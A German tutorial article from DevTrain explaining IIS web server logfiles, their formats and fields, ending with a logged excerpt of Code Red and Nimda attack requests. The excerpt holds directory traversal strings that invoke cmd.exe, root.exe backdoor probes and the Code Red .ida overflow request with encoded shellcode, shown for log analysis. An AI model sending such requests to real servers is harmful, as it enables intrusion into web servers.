DevTrain Startseite Advanced Developers Conference vom 14.-15. Februar 2011  
  
  
SUCHEN:  
ARTIKEL ONLINE: 525   

Kategorien
.NET
Datenbanken
Web
XML

Allgemein
Camp
Foren
Events
Persönliche Einstellungen
Registrieren
Prämien Shop
Kontakt
Impressum
Über DevTrain

Autoren


   Autor: Hannes Preishuber Artikel Drucken
        
IIS Anfragen im Detail (Logfiles)

Webserver wie der IIS haben die Fähigkeit alles aufzuzeichnen was so passiert. Dies ist auch wichtig um analysen über das Benutzerverahlten oder eventuelle Angriffe zu treiben.
Dabei werden alle Anfragen von Webbrowsern oder anderen Clients an den WebServer in den sogenannten Logfiles gespeichert.
Dabei wird je nach Einstellung aufgezeichnet
· Wann
· Welche Seite
· Welcher Browsertyp
· Welche IP Adresse
· Ob die Anfage erfolgreich war
· Und einiges Mehr
Andere Ereignisse werden in das Eventlog des Betriebsystems geschrieben.
Die Logfiles können verwendet werden um statistische Auswertungen vorzunehmen. Z.B. können so Zugriffsgrafiken für die 10 besten Seiten erstellt werden.
Ein weiterer Anwendungszweck ist eventuelle Hacks und Sicherheitslöcher festzustellen.
Der dritte Bereich für Logfiles ist die Fehlersuche. Wenn alle Hoffnung schwindet, hilft oft ein Blick ins Logfile um eine Ahnung vom Problem zu bekommen.

Das Logging wird über die Management Konsole des IIS (MMC) aktiviert. Sie können das Format auswählen, in dem der Webserver die Benutzeraktivitäten aufzeichnet. Folgende Formate sind verfügbar:

W3C-erweitert
Microsoft IIS
NCSA allgemein


Log1

Nehmen Sie am besten das W3C Format. Das Ergebnis sieht dann wir folgt aus.

#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 1998-05-02 17:42:15
#Fields: time c-ip cs-method cs-uri-stem sc-status cs-version
17:42:15 172.16.255.255 GET /default.htm 200 HTTP/1.0


Dabei kann je nach Umgebung die eingestellt werden wie oft ein neues Logfile erzeugt werden soll. Meist wird täglich gewählt. Wenn die Bewegungen aber wenige sind oder über Jahre die Zugriffe archiviert werden sollen empfiehlt sich z.B. monatlich.
Bei steigenden Traffic sollten kürzere Intervalle gewählt werden.

Log2

Ausserdem stehen Sie hier den Speicherot des Logfiles. Dies wird besonders wichtig, wenn Sie mehrere virtuelle Server betreiben, da diese in getrennte Verzeichnisse mit nichtssagenden Namen loggen.

Sie können selbst festlegen was im Logfiles alles aufgezeichnet werden soll. Also zb. die IP Adresse des Anforderers (äusserst sinnvoll). Je mehr Sie auswählen desto mehr Platz brauchen natürlich die Logdateien. Sie können übrigens auch noch z.b. per ASP META Infos in die Logfiles einfügen um noch mehr Infos über das Nutzerverhalten zu erhalten. Der Commerce Server von Microsoft nutzt dies um so das Interesse an einem bestimmten Produkt festzustellen.


Log3

Nun zur Analyse der Aufzeichnung. Was steht da alles drinnen.

Nehmen Sie am besten das W3C Format. Das Ergebnis sieht dann wir folgt aus.

#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 1998-05-02 17:42:15
#Fields: time c-ip cs-method cs-uri-stem sc-status cs-version
17:42:15 172.16.255.255 GET /default.htm 200 HTTP/1.0

Die ersten Zeilen zeigen nur den Start des Webservers an und sollten nur einmal enthalten sein.
17:42:15       Uhrzeit nach GMT
172.16.255.255 IP Adresse des Anfordereres
GET            HTTP Befehl (üblich GET und POST)
/default.htm   angeforderte Resource
200            HTTP Status Code 200 = OK, 404= File not found

Eventuell können noch der Name des authentifizierten Benutzers und andere nützlich Dinge drinnen stehen.

Der IIS kann übrigens auch die Bewegungen am SMTP oder NNTP Server aufzeichen.

So und anbei noch das Logfile mit Attacken von Code Red und Ninmda. Der mit den vielen xxx ist Code Red.

#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2001-09-21 05:21:42
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent)
2001-09-21 05:21:42 127.0.0.1 - 127.0.0.1 80 GET /iday/ - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+NT+5.0)
2001-09-21 05:56:37 212.98.160.51 - 212.6.196.182 80 GET /scripts/root.exe /c+dir 404 -
2001-09-21 05:56:39 212.98.160.51 - 212.6.196.182 80 GET /MSADC/root.exe /c+dir 403 -
2001-09-21 05:56:41 212.98.160.51 - 212.6.196.182 80 GET /c/winnt/system32/cmd.exe /c+dir 404 -
2001-09-21 05:56:43 212.98.160.51 - 212.6.196.182 80 GET /d/winnt/system32/cmd.exe /c+dir 404 -
2001-09-21 05:56:45 212.98.160.51 - 212.6.196.182 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2001-09-21 05:56:46 212.98.160.51 - 212.6.196.182 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 500 -
2001-09-21 05:56:47 212.98.160.51 - 212.6.196.182 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2001-09-21 05:56:49 212.98.160.51 - 212.6.196.182 80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 403 -
2001-09-21 05:56:51 212.98.160.51 - 212.6.196.182 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 500 -
2001-09-21 05:56:52 212.98.160.51 - 212.6.196.182 80 GET /scripts/winnt/system32/cmd.exe /c+dir 404 -
2001-09-21 05:56:53 212.98.160.51 - 212.6.196.182 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir 500 -
2001-09-21 05:56:55 212.98.160.51 - 212.6.196.182 80 GET /scripts/..../winnt/system32/cmd.exe /c+dir 500 -
2001-09-21 05:56:56 212.98.160.51 - 212.6.196.182 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2001-09-21 05:56:57 212.98.160.51 - 212.6.196.182 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2001-09-21 05:56:58 212.98.160.51 - 212.6.196.182 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2001-09-21 05:56:59 212.98.160.51 - 212.6.196.182 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 500 -
2001-09-21 06:13:38 212.216.148.199 - 212.6.196.182 80 GET /default.ida XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 200 -
2001-09-21 06:27:45 203.70.81.81 - 212.6.196.182 80 GET /scripts/root.exe /c+dir 404 -
2001-09-21 06:27:47 203.70.81.81 - 212.6.196.182 80 GET /MSADC/root.exe /c+dir 403 -
 
Zur grafischen Analyse müssen Sie auf Tools zurückgreifen. Einen Artikel dazu finden Sie ebenfalls auf www.devtrain.de

 

 

 


DevTrain Camp - Schneller zum .NET 3.5 Developer
 
Verwandte Artikel      Verlinkte Dokumente
    Keine verknüpften Dokumente
    Keine Links vorhanden

  Erfasst am: 21.09.2001
  Gültig bis: 21.10.2001
5 Ratings
Bewertung: 80,0%
schlecht    sehr gut  

 
© Copyright 2007 ppedv AG